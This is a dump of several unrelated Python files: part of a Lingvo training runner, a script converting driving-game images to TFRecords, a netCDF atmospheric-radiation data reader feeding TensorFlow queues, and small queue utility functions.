self.StartRunners( self.CreateRunners(['controller', 'trainer'], logdir, trial)) evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir, FLAGS.tf_master, trial) evaler.EvalLatestCheckpoint() elif job == 'all_sync': # For sync mode: Run controller, trainer_client, evaler jobs in one # process, multiple threads. self.StartRunners( self.CreateRunners(['controller', 'trainer_client'], logdir, trial)) evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir, FLAGS.tf_master, trial) evaler.EvalLatestCheckpoint() else: # Run each job in separate process/task # TODO(rpang): add support for running evaler_test and decoder. self.StartRunners(self.CreateRunners([job], logdir, trial)) def MaybeConfigRunLocally(self): """Update flags if configured to run locally.""" if not FLAGS.run_locally: # Do nothing return FLAGS.tf_master = tf.train.Server.create_local_server().target if not FLAGS.mode: FLAGS.mode = 'sync' if not FLAGS.job: if FLAGS.run_locally == 'tpu': FLAGS.job = 'trainer_client' else: FLAGS.job = 'controller,trainer_client' FLAGS.task = 0 FLAGS.controller_job = '/job:local' FLAGS.worker_job = '/job:local' FLAGS.worker_replicas = 1 if FLAGS.run_locally == 'gpu': if not FLAGS.worker_gpus: FLAGS.worker_gpus = 1 else: FLAGS.worker_gpus = 0 if FLAGS.run_locally == 'tpu': FLAGS.xla_device = 'tpu' FLAGS.enable_asserts = False else: FLAGS.worker_tpus = 0 if not FLAGS.worker_split_size: FLAGS.worker_split_size = 1 FLAGS.ps_job = '/job:local' FLAGS.ps_replicas = 1 FLAGS.ps_gpus = 0 FLAGS.input_job = '/job:local' FLAGS.input_replicas = 0 FLAGS.evaler_job = '/job:local' FLAGS.evaler_replicas = 1 if FLAGS.run_locally == 'gpu': FLAGS.evaler_gpus = 1 else: FLAGS.evaler_gpus = 0 FLAGS.decoder_job = '/job:local' FLAGS.decoder_replicas = 1 if FLAGS.run_locally == 'gpu': FLAGS.decoder_gpus = 1 else: FLAGS.decoder_gpus = 0 def InspectModel(self): """Prints out model analysis for the model.""" FLAGS.mode = 'sync' p = self.GetParamsForDataset('controller', 
'Train') c = cluster_factory.Cluster(p.cluster) with tf.Graph().as_default(), c, tf.device(c.GetPlacer()): analysis, _ = _ModelAnalysis(p.Instantiate()) print(analysis) def InspectDatasets(self): """Prints out datasets configured for the model.""" cls = self.model_registry.GetClass(self._model_name) datasets = [] for name, _ in inspect.getmembers(cls, inspect.ismethod): if name not in ['GetDatasetParams', 'Model', 'Task' ] and not name.startswith('_'): datasets += [name] print(','.join([_.lower() for _ in datasets])) def InspectDecoder(self): """Prints out datasets configured for the decoder.""" cls = self.model_registry.GetClass(self._model_name) has_decoder = False if issubclass(cls, base_model_params.SingleTaskModelParams): has_decoder = cls.Task( ).cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics else: for _, task_param in cls.Model().task_params.IterParams(): has_decoder |= ( task_param.cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics) if has_decoder: # We assume that the proper decoder is implemented. self.InspectDatasets() else: print('') def WriteInferenceGraph(self): """Generates the inference graphs for a given model.""" inference_graph_dir = os.path.join(FLAGS.logdir, 'inference_graphs') tf.gfile.MakeDirs(inference_graph_dir) tf.logging.info('Writing inference graphs to dir: %s', inference_graph_dir) cfg = self.model_registry.GetParams(self._model_name, 'Test') if (issubclass(cfg.cls, base_model.MultiTaskModel) and not FLAGS.model_task_name): tf.logging.info('Cannot write inference graphs for multi-task model ' 'when model_task_name is not specified.') return try: filename_prefix = 'inference' if FLAGS.model_task_name: filename_prefix = '%s_inference' % FLAGS.model_task_name filename_prefix = os.path.join(inference_graph_dir, filename_prefix) # Standard inference graph. 
self.inference_graph_exporter.InferenceGraphExporter.Export( model_cfg=cfg, model_task_name=FLAGS.model_task_name, export_path=filename_prefix + '.pbtxt') except NotImplementedError as e: tf.logging.error('Cannot write inference graph: %s', e) # TPU inference graph. Not all models support it so fail silently. try: self.inference_graph_exporter.InferenceGraphExporter.Export( model_cfg=cfg, model_task_name=FLAGS.model_task_name, device_options=self.inference_graph_exporter.InferenceDeviceOptions( device='tpu', retain_device_placement=False, var_options='ON_DEVICE', gen_init_op=True, dtype_override=None), export_path=filename_prefix + '_tpu.pbtxt') except Exception as e: # pylint: disable=broad-except tf.logging.info('Error exporting TPU inference graph: %s' % e) def Start(self): """Start the process.""" tf.logging.set_verbosity(tf.logging.INFO) assert self.model_registry.GetClass( self._model_name), ('Model %s is not found.' % FLAGS.model) if FLAGS.mode == 'inspect_model': self.InspectModel() return if FLAGS.mode == 'inspect_evaler': self.InspectDatasets() return if FLAGS.mode == 'inspect_decoder': self.InspectDecoder() return if FLAGS.mode == 'write_inference_graph': self.WriteInferenceGraph() return if FLAGS.mode == 'shell': _StartShell(locals()) return assert FLAGS.mode in ['sync', 'async'] self.MaybeConfigRunLocally() self.MaybeConfigRunDistributed() self.MaybeLaunchTensorFlow() self.StartRunners(self.CreateRunners(FLAGS.job.split(','), FLAGS.logdir)) def main(unused_argv): # pylint: disable=g-import-not-at-top # pylint: disable=unused-variable from lingvo import model_imports RunnerManager(FLAGS.model).Start() if __name__ == '__main__': tf.app.run(main)
# ==== gta_tfrecords_3Dconvolutions.py ====
# coding: utf-8 # Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Converts image data to TFRecords file format with Example protos. The image data set is expected to reside in JPEG files located in the following directory structure. data_dir/image0.jpeg data_dir/image1.jpg ... label_dir/weird-image.jpeg label_dir/my-image.jpeg ... This TensorFlow script converts the training and evaluation data into a sharded data set consisting of TFRecord files """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from datetime import datetime from collections import deque import os import random import sys import threading import cv2 import pandas as pd import numpy as np import tensorflow as tf tf.app.flags.DEFINE_integer('num_threads', 1 , 'Number of threads to preprocess the images.') FLAGS = tf.app.flags.FLAGS def _float_feature(value): if not isinstance(value,list): value=[value] return tf.train.Feature(float_list=tf.train.FloatList(value=value)) def _int64_feature(value): """Wrapper for inserting int64 features into Example proto.""" if not isinstance(value, list): value = [value] return tf.train.Feature(int64_list=tf.train.Int64List(value=value)) def _bytes_feature(value): """Wrapper for inserting bytes features into Example proto.""" return 
tf.train.Feature(bytes_list=tf.train.BytesList(value=[value])) def _convert_to_example(in_example,labels): """Build an Example proto for an example. Args: image : image as string labels: a list containing [throttle,brake,steering] Returns: Example proto """ example = tf.train.Example(features=tf.train.Features(feature={ 'steering': _float_feature(labels[0]), 'throttle':_float_feature(labels[1]), 'brake':_float_feature(labels[2]), 'speed': _float_feature(labels[3]), 'image': _bytes_feature(tf.compat.as_bytes(in_example)) })) return example class ImageCoder(object): """Helper class that provides TensorFlow image coding utilities.""" def __init__(self,labels_filename): # Create a single Session to run all image coding calls. self._sess = tf.Session() # Initializes function that decodes RGB png data. self._png_data = tf.placeholder(dtype=tf.string) self._decode_png = tf.image.decode_image(self._png_data, channels=3) self.csv = pd.read_csv(labels_filename,header=None) def decode_png(self,image_data): return self._sess.run(self._decode_png,feed_dict={self._png_data:image_data}) def _is_png(filename): """Determine if a file contains a PNG format image. Args: filename: string, path of the image file. Returns: boolean indicating if the image is a PNG. """ return '.png' in filename def _process_image(filename, coder): """Process a single image file. Args: filename: string, path to an image file e.g., '/path/to/example.JPG'. coder: instance of ImageCoder to provide TensorFlow image coding utils. Returns: image_buffer: string, JPEG encoding of RGB image. height: integer, image height in pixels. width: integer, image width in pixels. """ # Read the image file. with tf.gfile.FastGFile(filename, 'rb') as f: image_data = f.read() # tf.read_file() # sess = tf.Session() # image=sess.run(tf.image.decode_png(tf.read_file(filename),channels=3)) # Decode the RGB JPEG. 
# image = coder.decode_png(image_data) # # Check that image converted to RGB # assert len(image.shape) == 3 # height = image.shape[0] # width = image.shape[1] # assert image.shape[2] == 3 return image_data def _process_image_files_batch(coder, thread_index, ranges, name, image_filenames, num_shards, output_directory): """Processes and saves list of images as TFRecord in 1 thread. Args: coder: instance of ImageCoder to provide TensorFlow image coding utils. thread_index: integer, unique batch to run index is within [0, len(ranges)). ranges: list of pairs of integers specifying ranges of each batches to analyze in parallel. name: string, unique identifier specifying the data set image_filenames: list of strings; each string is a path to an image file label_filenames: list of strings; each string is a path to an image file num_shards: integer number of shards for this data set. """ # Each thread produces N shards where N = int(num_shards / num_threads). # For instance, if num_shards = 128, and the num_threads = 2, then the first # thread would produce shards [0, 64). num_threads = len(ranges) assert not num_shards % num_threads num_shards_per_batch = int(num_shards / num_threads) shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1], num_shards_per_batch + 1).astype(int) num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0] counter = 0 img_queue = deque([], maxlen=11) for s in range(num_shards_per_batch): # Generate a sharded version of the file name, e.g. 
'train-00002-of-00010' shard = thread_index * num_shards_per_batch + s output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards) output_file = os.path.join(output_directory, output_filename) writer = tf.python_io.TFRecordWriter(output_file) shard_counter = 0 files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int) for i in files_in_shard: orig = image_filenames+'/img'+str(i)+'.png' img = cv2.cvtColor(cv2.imread(orig),cv2.COLOR_RGB2BGR) label = coder.csv.values[i].tolist() img_queue.append(img) # image_buffer = _process_image(orig, coder) if counter > 10: example = _convert_to_example(np.array(img_queue).tostring(),label) writer.write(example.SerializeToString()) shard_counter += 1 counter += 1 if not counter % 1000: print('%s [thread %d]: Processed %d of %d images in thread batch.' % (datetime.now(), thread_index, counter, num_files_in_thread)) sys.stdout.flush() writer.close() print('%s [thread %d]: Wrote %d images to %s' % (datetime.now(), thread_index, shard_counter, output_file)) sys.stdout.flush() shard_counter = 0 print('%s [thread %d]: Wrote %d images to %d shards.' % (datetime.now(), thread_index, counter, num_files_in_thread)) sys.stdout.flush() def _process_image_files(name, orig_filenames, label_filenames, num_shards, output_directory): """Process and save list of images as TFRecord of Example protos. Args: name: string, unique identifier specifying the data set orig_filenames: list of strings; each string is a path to an image file label_filenames: list of strings; each string is a path to an image file num_shards: integer number of shards for this data set. output_directory : Directory for output files """ # Create a generic TensorFlow-based utility for converting all image codings. 
coder = ImageCoder(labels_filename = label_filenames) print ('labels_length : ',coder.csv.shape[0]) spacing = np.linspace(0, coder.csv.shape[0], FLAGS.num_threads + 1).astype(np.int) ranges = [] for i in range(len(spacing) - 1): ranges.append([spacing[i], spacing[i+1]]) # Launch a thread for each batch. print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges)) sys.stdout.flush() # Create a mechanism for monitoring when all threads are finished. coord = tf.train.Coordinator() threads = [] for thread_index in range(len(ranges)): args = (coder, thread_index, ranges, name, orig_filenames, num_shards, output_directory) t = threading.Thread(target=_process_image_files_batch, args=args) t.start() threads.append(t) # Wait for all the threads to terminate. coord.join(threads) print('%s: Finished writing all %d images in data set.' % (datetime.now(), len(orig_filenames))) sys.stdout.flush() def main(orignal_image_folder, label_filename, output_directory, num_shards): # orig_img_paths = [os.path.join(orignal_image_folder,im) for im in os.listdir(orignal_image_folder) if os.path.isfile (os.path.join(orignal_image_folder,im))] _process_image_files("train", orignal_image_folder, label_filename, num_shards, output_directory) if __name__ == '__main__': if len(sys.argv) < 5: print ("Usage imagesToTfrecords <input_images_folder> <label_images_folder> <output_folder> <num partitions (multiples of 4)>") else: main(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4])) # For reading files # import tensorflow as tf # import matplotlib.pyplot as plt # filename = "../Data/tfrecords/cool-00000-of-00004" # sess = tf.Session() # for serialized_example in tf.python_io.tf_record_iterator(filename): # example = tf.train.Example() # example.ParseFromString(serialized_example) # # traverse the Example format to get data # img = example.features.feature['origimage/encoded'] # # get the data out of tf record # orignal_image_height = example.features.feature['orig/image/height'] 
# orignal_image_width = example.features.feature['orig/image/width'] # orignal_image_colors = example.features.feature['orig/image/colorspace'] # orignal_image_channels = example.features.feature['orig/image/channels'] # orignal_image_format = example.features.feature['orig/image/format'] # orignal_image_filename = example.features.feature['orig/image/filename'] # orignal_image_data = example.features.feature['orig/image/encoded'] # noisy_image_height = example.features.feature['label/image/height'] # noisy_image_width = example.features.feature['label/image/width'] # noisy_image_colors = example.features.feature['label/image/colorspace'] # noisy_image_channels = example.features.feature['label/image/channels'] # noisy_image_format = example.features.feature['label/image/format'] # noisy_image_filename = example.features.feature['label/image/filename'] # noisy_image_data = example.features.feature['label/image/encoded'] # orignal_image = sess.run(tf.image.decode_jpeg(orignal_image_data.bytes_list.value[0], channels=3)) # noisy_image = sess.run(tf.image.decode_jpeg(noisy_image_data.bytes_list.value[0], channels=3)) # plt.subplot(121) # plt.title("Image Name : " + str(orignal_image_filename.bytes_list.value[0]) + "\n" + # "Image Height : " + str(orignal_image_height.int64_list.value[0]) + "\n" + # "Image Weight : " + str(orignal_image_width.int64_list.value[0]) + "\n" + # "Image ColourSpace : " + str(orignal_image_colors.bytes_list.value[0]) + "\n" + # "Image Channels : " + str(orignal_image_channels.int64_list.value[0]) + "\n" + # "Image format : " + str(orignal_image_format.bytes_list.value[0]) + "\n") # plt.imshow(orignal_image) # plt.subplot(122) # plt.title("Image Name : " + str(noisy_image_filename.bytes_list.value[0]) + "\n" + # "Image Height : " + str(noisy_image_height.int64_list.value[0]) + "\n" + # "Image Weight : " + str(noisy_image_width.int64_list.value[0]) + "\n" + # "Image ColourSpace : " + str(noisy_image_colors.bytes_list.value[0]) + "\n" + # "Image 
Channels : " + str(noisy_image_channels.int64_list.value[0]) + "\n" + # "Image format : " + str(noisy_image_format.bytes_list.value[0]) + "\n") # plt.imshow(noisy_image) # plt.show() # break
# ==== fileReader.py ====
import fnmatch
import os
import random
import re
import threading
import json
import tensorflow as tf
from netCDF4 import Dataset
import numpy as np
from sklearn.metrics import mean_squared_error
from scipy.interpolate import splev, splrep

"""
Data v7: statistical values
ST: min 100.0000000000 max 333.1499946801 mean 268.1406929063 std 37.5368706325
C: min 0.0000000000 max 0.0099999904 mean 0.0017284657 std 0.0023850203
R: min -255.9600440474 max 78.3198382662 mean -1.3758656541 std 6.1112494507
T: min 100.0000000000 max 355.5721906214 mean 230.1788102309 Td 46.5063403685
H: min -2720.3344538111 max 1848.3667831706 mean 4.2050377031 Hd 13.4852605066
"""

# Min/max bounds used by the min-max normalizers below.  The commented values
# are measured dataset statistics; the active values are widened manually.
# #minT = 178.87485
minT = 150
#maxT = 310.52261
maxT = 340
minC = 0
maxC = 0.01
#minH = 6.324828e-08
minH = 0
#maxH = 0.021951281
maxH = 0.1
minR = -59.08844
maxR = 14.877947
minP = 0.0
maxP = 103000

# Global epoch counter shared by all reader threads (incremented in
# FileReader.thread_main under no lock — NOTE(review): racy by design here).
epoch = 0
# Serializes netCDF file access across reader threads (see load_data_samples).
lock = threading.Lock()

# Fixed pressure grid (Pa) that every profile is interpolated onto:
# 10 coarse levels up to 10 kPa, then 25 + 25 finer levels.
standard_x = np.linspace(1, 10000, 10)
standard_x = np.append(standard_x, np.linspace(11000, 80000, 25))
standard_x = np.append(standard_x, np.linspace(82760, 103000, 25))
standard_x = standard_x.tolist()
level_size = len(standard_x)


def cal_air_pressure(air_pressure_interface):
    """Mid-point air pressure per level from the 61 interface pressures.

    NOTE(review): output buffer is hard-coded to 60 levels; assumes
    len(air_pressure_interface) == 61 — confirm against the data format.
    """
    air_pressure = np.empty(60)
    for level in range(len(air_pressure_interface) - 1):
        air_pressure[level] = (air_pressure_interface[level] + air_pressure_interface[level+1])*0.5
    return air_pressure


def normalizeT(t):
    # Temperature min-max normalization.
    return normalize(t, minT, maxT)


def normalizeH(h):
    # Humidity min-max normalization.
    return normalize(h, minH, maxH)


def normalizeC(c):
    # CO2 concentration min-max normalization.
    return normalize(c, minC, maxC)


def normalizeR(r):
    # Radiation min-max normalization.
    return normalize(r, minR, maxR)


def normalizeP(p):
    # Pressure min-max normalization.
    return normalize(p, minP, maxP)


def normalize(x, min, max, mean=1, std=1):
    """Min-max normalize x into [0, 1] given the bounds.

    NOTE(review): `min`/`max` shadow the builtins; `mean`/`std` are only
    used by the commented-out zero-mean variant.
    """
    # TODO: add option to choose between min-max of zero-mean normalization
    return (x - min) / (max - min)  # min max normalization
    # return (x - mean) / std  # standardization - zero-mean normalization
    # return x+100


def denormalize(x, mean, std):
    """Inverse of zero-mean standardization (x * std + mean)."""
    return x * std + mean


def get_category_cardinality(files):
    """
    Deprecated: function used before for identifying the samples based in
    its name and calculate the minimum and maximum sample id.

    :param files: array of root paths.
    :return: min_id, max_id: int
    """
    file_pattern = r'([0-9]+)\.csv'
    id_reg_expression = re.compile(file_pattern)
    min_id = None
    max_id = None
    for filename in files:
        # Sample id is the numeric part of the file name, e.g. "123.csv".
        id = int(id_reg_expression.findall(filename)[0])
        if min_id is None or id < min_id:
            min_id = id
        if max_id is None or id > max_id:
            max_id = id
    return min_id, max_id


def randomize_files(files):
    """
    Function that randomizes a list of filePaths.

    Samples WITH replacement: each yielded element is a uniformly random
    pick, so some files may repeat and others be skipped within one pass.

    :param files: list of path files
    :return: iterable of random files
    """
    for file in files:
        file_index = random.randint(0, (len(files) - 1))
        yield files[file_index]


def find_files(directory, pattern='*.csv'):
    """
    Recursively finds all files matching the pattern.

    :param directory: directory path
    :param pattern: reggex (fnmatch-style glob, e.g. '*.csv')
    :return: list of files
    """
    files = []
    for root, dirnames, filenames in os.walk(directory):
        for filename in fnmatch.filter(filenames, pattern):
            files.append(os.path.join(root, filename))
    return files


def interpolate(x, y, standard_x, t_or_h='r'):
    """Spline-interpolate a profile y(x) onto the fixed grid `standard_x`.

    Grid points outside the sample's pressure range are zero-padded; the
    two boundary samples are clamped to their neighbours to suppress spline
    edge artifacts.  `t_or_h` selects the normalization applied to the
    interpolated values: 't' temperature, 'h' humidity, anything else raw.
    """
    # Input profiles come top-down; splrep needs increasing x.
    x = np.flip(x,0)
    y = np.flip(y,0)
    level_size = len(standard_x)
    spl = splrep(x, y)
    # First grid index covered by the sample's x-range (loop variable is
    # reused after the loop — NOTE(review): if x[0] <= standard_x[0] this
    # yields start_index == -1; presumably never happens with this grid).
    for start_index, start in enumerate(standard_x):
        if x[0] <= start:
            start_index = start_index - 1
            break
    # One past the last covered grid index.
    for end_index, end in enumerate(standard_x):
        if x[-1] <= end:
            end_index = end_index + 1
            break
    #valid intervals [start_index, end_index)
    interpolated = splev(standard_x[start_index:end_index], spl)
    # Clamp the two extrapolated boundary points to their neighbours.
    interpolated[0] = interpolated[1]
    interpolated[-1] = interpolated[-2]
    if t_or_h == 't':
        standard_y = np.append(np.zeros(start_index), normalizeT(interpolated))
        standard_y = np.append(standard_y, np.zeros(level_size - end_index))
    elif t_or_h == 'h':
        standard_y = np.append(np.zeros(start_index), normalizeH(interpolated))
        standard_y = np.append(standard_y, np.zeros(level_size - end_index))
    else:
        standard_y = np.append(np.zeros(start_index), interpolated)
        standard_y = np.append(standard_y, np.zeros(level_size - end_index))
    assert len(standard_y) == level_size
    return standard_y


def load_data_samples(files):
    """
    Generator that yields samples from the directory.

    Reads each netCDF file's 'radiation_data' matrix (one row per sample),
    interpolates the temperature/humidity/radiation profiles onto the
    standard pressure grid, normalizes them, and yields model-ready arrays.
    Row layout assumed: [0]=CO2, [1]=surface T, [2:62]=air T, [62:122]=H,
    [122:182]=R, [182:243]=interface pressures — TODO confirm.

    :param files: list of files
    :return: iterable that contains the data, the label and the identifier
        of the sample.
    """
    for filename in files:
        # Only the file read is serialized; processing runs concurrently.
        with lock:
            f = Dataset(filename, mode='r')
            v = f.variables['radiation_data'][:]
            f.close()
        #ids = np.random.choice(np.arange(v.shape[0]), size = 10, replace=False)
        for id in range(v.shape[0]):
            #data = np.append(v[id,0:122],v[id, 182:243])
            #data = np.append(v[id,0:2],normalizeT(v[id, 2:62]))
            #data = np.append(data, normalizeH(v[id,62:122]))
            #data = np.append(data, normalizeP(v[id,182:243]))
            '''
            data = []
            for i in range(60):
                data.append(normalizeC(v[id, 0]))
                data.append(normalizeT(v[id, 1]))
                data.append(normalizeT(v[id, i+2]))
                data.append(normalizeH(v[id, i + 62]))
                data.append(normalizeP(v[id, i + 182]))
            '''
            # data = np.append(data, normalizeC(v[id, 0]))
            # data = np.append(data, normalizeT(v[id, 1]))
            # data = np.append(data, normalizeT(v[id, i+2]))
            # data = np.append(data, normalizeH(v[id, i + 62]))
            # data = np.append(data, normalizeP(v[id, i + 182]))
            air_pressure = cal_air_pressure(v[id, 182:243])
            inter_air_temperature = interpolate(air_pressure, v[id, 2:62], standard_x, 't')
            inter_humidity = interpolate(air_pressure, v[id, 62:122], standard_x, 'h')
            inter_radiation = interpolate(air_pressure, v[id, 122:182], standard_x)
            # Input = [CO2, surface T, zero padding] + T profile + H profile,
            # each segment `level_size` wide.
            data = np.append(normalizeC(v[id, 0]), normalizeT(v[id, 1]))
            data = np.append(data, np.zeros(level_size - 2))
            data = np.append(data, inter_air_temperature)
            data = np.append(data, inter_humidity)
            #data = np.append(data, normalizeP(v[id, 182:243]))
            label = np.array(inter_radiation)
            '''
            data.append(v[id,0])
            data.append(v[id,1])
            num_levels = int((v.shape[1]-2)/3)
            for i in range(num_levels):
                data.append(v[id,i+2])
                data.append(v[id,i+98])
                label.append(v[id,i+194])
            for _ in range(0, 196 - 194):
                data.append(np.float32(0.0))
            '''
            # Skip samples whose interpolation produced NaNs.
            if np.isnan(data.sum()) or np.isnan(label.sum()):
                print("NaN found!!!!!")
                continue
            yield data, label, [id]


class FileReader(object):
    """
    Background reader that pre-processes radiation files and enqueues them
    into a TensorFlow queue.

    Maintains two PaddingFIFOQueues (train/test) selected at run time via
    the `select_q` placeholder.
    """

    def __init__(self, data_dir, test_dir, coord, n_input=180, n_output=60,
                 queue_size=5000000, test_percentage=0.2):
        # TODO: Implement a option that enables the usage of a test queue, by default it is
        # enabled here. For implementing this, the flag should be propagated to the several
        # functions that operate with both queues.
        self.data_dir = data_dir
        self.test_dir = test_dir
        self.coord = coord          # tf.train.Coordinator controlling the reader threads
        self.n_input = n_input
        self.n_output = n_output
        self.threads = []
        # Feed placeholders for the enqueue ops (one set per queue).
        self.sample_placeholder_train = tf.placeholder(tf.float32, [n_input])
        self.result_placeholder_train = tf.placeholder(tf.float32, [n_output])
        self.sample_placeholder_test = tf.placeholder(tf.float32, [n_input])
        self.result_placeholder_test = tf.placeholder(tf.float32, [n_output])
        self.idFile_placeholder_test = tf.placeholder(tf.int32, [1])
        self.idFile_placeholder_train = tf.placeholder(tf.int32, [1])
        self.queue_train = tf.PaddingFIFOQueue(queue_size,
                                               [tf.float32, tf.float32, tf.int32],
                                               shapes=[[n_input], [n_output], [1]])
        self.queue_test = tf.PaddingFIFOQueue(queue_size,
                                              [tf.float32, tf.float32, tf.int32],
                                              shapes=[[n_input], [n_output], [1]])
        self.enqueue_train = self.queue_train.enqueue(
            [self.sample_placeholder_train, self.result_placeholder_train,
             self.idFile_placeholder_train])
        self.enqueue_test = self.queue_test.enqueue(
            [self.sample_placeholder_test, self.result_placeholder_test,
             self.idFile_placeholder_test])
        # https://github.com/tensorflow/tensorflow/issues/2514
        # https://groups.google.com/a/tensorflow.org/forum/#!topic/discuss/rmGu1HAyPw4
        # Use of a flag that changes the input queue to another one, this way
        # the model can be tested using the test queue when required.
        self.select_q = tf.placeholder(tf.int32, [])
        self.queue = tf.QueueBase.from_list(
            self.select_q, [self.queue_train, self.queue_test])
        # Find any file as the reggex is *
        self.files = find_files(data_dir, '*')
        if not self.files:
            raise ValueError("No data files found in '{}'.".format(data_dir))
        print("training files length: {}".format(len(self.files)))
        self.test_files = find_files(test_dir, '*')
        if not self.test_files:
            raise ValueError(
                "No test data files found in '{}'.".format(test_dir))
        print("test files length: {}".format(len(self.test_files)))
        # Split the data into test and train datasets
        # range = int(len(self.files) * test_percentage)
        self.test_dataset = self.test_files
        self.train_dataset = self.files

    def dequeue(self, num_elements):
        """
        Function for dequeueing a mini-batch.

        :param num_elements: int size of minibatch
        :return: (data, label, id) tensors of the selected queue
        """
        data, label, id = self.queue.dequeue_many(num_elements)
        return data, label, id

    def queue_switch(self):
        # Placeholder selecting the active queue: 0 = train, 1 = test.
        return self.select_q

    def thread_main(self, sess, id, n_thread, test):
        """
        Thread function to be launched as many times as required for loading
        the data from several files into the Tensorflow's queue.

        :param sess: Tensorflow's session
        :param id: thread ID
        :param n_thread: total number of reader threads (unused here)
        :param test: bool for choosing between the queue to feed the data,
            True for test queue
        :return: void
        """
        global epoch
        stop = False
        # Go through the dataset multiple times
        if test:
            files = self.test_dataset
        else:
            files = self.train_dataset
        # while tensorflows coordinator doesn't want to stop, continue.
        while not stop:
            epoch += 1
            if not test:
                print("Number of epochs: {}".format(epoch))
            randomized_files = randomize_files(files)
            '''
            file_partitions = []
            for index, i in enumerate(files):
                if (index)%(n_thread-1)+1 == id:
                    file_partitions.append(i)
            randomized_files = randomize_files(file_partitions)
            '''
            iterator = load_data_samples(randomized_files)
            for data, label, id_file in iterator:
                # update coordinator's state
                if self.coord.should_stop():
                    stop = True
                    break
                if test:
                    # in train range and test thread
                    sess.run(self.enqueue_test,
                             feed_dict={self.sample_placeholder_test: data,
                                        self.result_placeholder_test: label,
                                        self.idFile_placeholder_test: id_file})
                else:
                    # below the rage -> train
                    sess.run(self.enqueue_train,
                             feed_dict={self.sample_placeholder_train: data,
                                        self.result_placeholder_train: label,
                                        self.idFile_placeholder_train: id_file})

    def start_threads(self, sess, n_threads=2):
        """
        Reader threads' launcher, uses the first thread for feeding into the
        test queue and the rest for feeding into the train queue.

        :param sess: Tensorflow's session
        :param n_threads: total number of reader threads
        :return: list of started threads
        """
        for id in range(n_threads):
            if id == 0:
                thread = threading.Thread(
                    target=self.thread_main, args=(sess, id, n_threads, True))
            else:
                thread = threading.Thread(
                    target=self.thread_main, args=(sess, id, n_threads, False))
            thread.daemon = True  # Thread will close when parent quits.
            thread.start()
            self.threads.append(thread)
        return self.threads

    # not used anymore
    def decompose_data(self, data):
        """Deprecated: split a flat 96-level sample back into named fields.

        NOTE(review): meanT/stdT/meanH/stdH are not defined anywhere in this
        module — this method would raise NameError if called.
        """
        levels = 96
        CO2 = data[0]
        surface_temperature = data[1]
        air_temperature = []
        humidity = []
        for i in range(2, levels * 2 + 2):
            if (i % 2) == 0:  # even
                air_temperature.append(denormalize(data[i], meanT, stdT))
            else:
                humidity.append(denormalize(data[i], meanH, stdH))
        input_dic = {
            "surface_temperature": surface_temperature,
            "co2": CO2,
            "air_temperature": air_temperature,
            "humidity": humidity
        }
        return input_dic
q.py
from queue import Queue
from threading import Thread
from time import sleep

from bripy.bllb.logging import logger, DBG


def unloadq(q, stop, limit=2000, rest=.1, check=100):
    """Drain items from *q* into a list until told to stop.

    Polls the queue; every miss costs one unit of patience (starting at
    *limit*), every hit restores one (capped at *limit*).  The loop keeps
    running while there is patience left and ``stop()`` is false, or while
    items remain queued — so a stop request still drains the backlog.

    :param q: queue.Queue to drain
    :param stop: zero-arg callable; truthy return requests shutdown
    :param limit: initial/maximum patience (empty polls tolerated)
    :param rest: seconds to sleep after an empty poll
    :param check: emit a debug line every *check* loops/misses
    :return: list of items taken from the queue
    """
    i = limit
    loops = 0
    results = []
    # `True and (...)` in the original was redundant — condition is identical.
    while (i and not stop()) or q.qsize():
        loops += 1
        if loops % check == 0:
            DBG(i, loops, len(results))
        if q.qsize():
            x = q.get()
            DBG(x)
            results.append(x)
            i = min(i + 1, limit)  # reward progress, capped at limit
        else:
            i -= 1
            if i % check == 0:
                DBG(i)
            sleep(rest)
    return results


def multiplex(n, q, **kwargs):
    """
    Convert one queue into several equivalent Queues

    >>> q1, q2, q3 = multiplex(3, in_q)
    """
    out_queues = [Queue(**kwargs) for _ in range(n)]

    def f():
        # Fan every incoming item out to all output queues, forever.
        while True:
            x = q.get()
            for out_q in out_queues:
                out_q.put(x)

    t = Thread(target=f)
    t.daemon = True
    t.start()
    return out_queues


def push(in_q, out_q):
    """Forward items from *in_q* to *out_q* forever (worker for merge)."""
    while True:
        x = in_q.get()
        out_q.put(x)


def merge(*in_qs, **kwargs):
    """
    Merge multiple queues together

    >>> out_q = merge(q1, q2, q3)
    """
    out_q = Queue(**kwargs)
    threads = [Thread(target=push, args=(q, out_q)) for q in in_qs]
    for t in threads:
        t.daemon = True
        t.start()
    return out_q


def iterq(q):
    """Yield items until the queue is momentarily empty (non-blocking drain)."""
    while q.qsize():
        yield q.get()


def get_q(q):
    """Drain *q* into a list, stopping early at a 'STOP' sentinel.

    Calls ``q.task_done()`` for every item consumed (including the
    sentinel) so ``q.join()`` observers are released.  Falsy items are
    consumed but not collected.
    """
    results = []
    # Original condition `not q.empty() or q.qsize()` reduces to "queue has
    # items": when empty both operands are false; when non-empty the first
    # is true.
    while q.qsize():
        item = q.get()
        if item == 'STOP':
            DBG('STOP get_q')
            q.task_done()
            break
        DBG(item)
        if item:
            results.append(item)
        q.task_done()
    return results
testProxy.py
